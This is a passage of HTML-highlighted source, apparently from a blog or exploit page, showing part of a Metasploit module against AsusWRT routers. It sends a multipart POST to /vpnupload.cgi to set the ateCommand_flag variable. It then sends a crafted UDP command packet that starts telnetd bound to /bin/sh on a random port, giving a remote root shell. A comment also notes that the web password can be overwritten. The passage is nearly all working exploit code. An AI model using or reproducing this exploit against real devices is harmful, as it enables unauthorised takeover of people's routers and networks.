<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'PAYLOAD'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-s\">'cmd\/unix\/interact'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'DisclosureDate'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">''<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'DefaultTarget'<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">register_options<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Opt<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">RPORT<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">9999<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-55\"><span
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">register_advanced_options<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptInt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'ASUSWRTPORT'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'AsusWRT HTTP portal port'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-61\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\"
id=\"crayon-5a66636295042778926259-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-63\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-v\">exploit<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">post_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">MIME<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Message<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-67\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">post_data<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_part<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'1'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-v\">transfer_encoding<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content_disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;form-data; name=&#92;&quot;ateCommand_flag&#92;&quot;&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post_data<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">to_s<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-71\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_request_cgi<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'uri'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\/vpnupload.cgi&quot;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div
class=\"crayon-line\" id=\"crayon-5a66636295042778926259-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'method'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'POST'<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'rport'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'ASUSWRTPORT'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'data'<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'ctype'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;multipart\/form-data; boundary=#{post_data.bound}&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-77\"><span
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">res <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;#{peer} - Successfully set the ateCommand_flag variable.&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail_with<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Failure<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Unknown<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;#{peer} - Failed to set ateCommand_flag variable.&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-83\"><span
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">info_pdu_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># expected packet size, not sure what the extra bytes are<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Random<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-90\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span
class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x0c<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'C*'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># NET_SERVICE_ID_IBOX_INFO\t0xC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x15<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'C*'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># NET_PACKET_TYPE_CMD 0x15<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x33<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span
class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'C*'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># NET_CMD_ID_MANU_CMD 0x33<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Info, don't know what this is<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># MAC address<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span
class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># Password<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">telnet_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1024<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\/usr\/sbin\/telnetd -l \/bin\/sh -p #{telnet_port}&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span
class=\"crayon-s\">'C*'<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pkt_syscmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'C*'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># cmd length<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># our command<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pkt_final<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt_syscmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bytes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info_pdu_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt_syscmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">connect_udp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-107\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">udp_sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">put<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pkt_final<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># we could process the response, but we don't care<\/span><\/div>\n<div
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">disconnect_udp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-109\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-110\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_status<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Packet sent, let&#8217;s sleep 10 seconds and try to connect to the router on port #{telnet_port}&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" 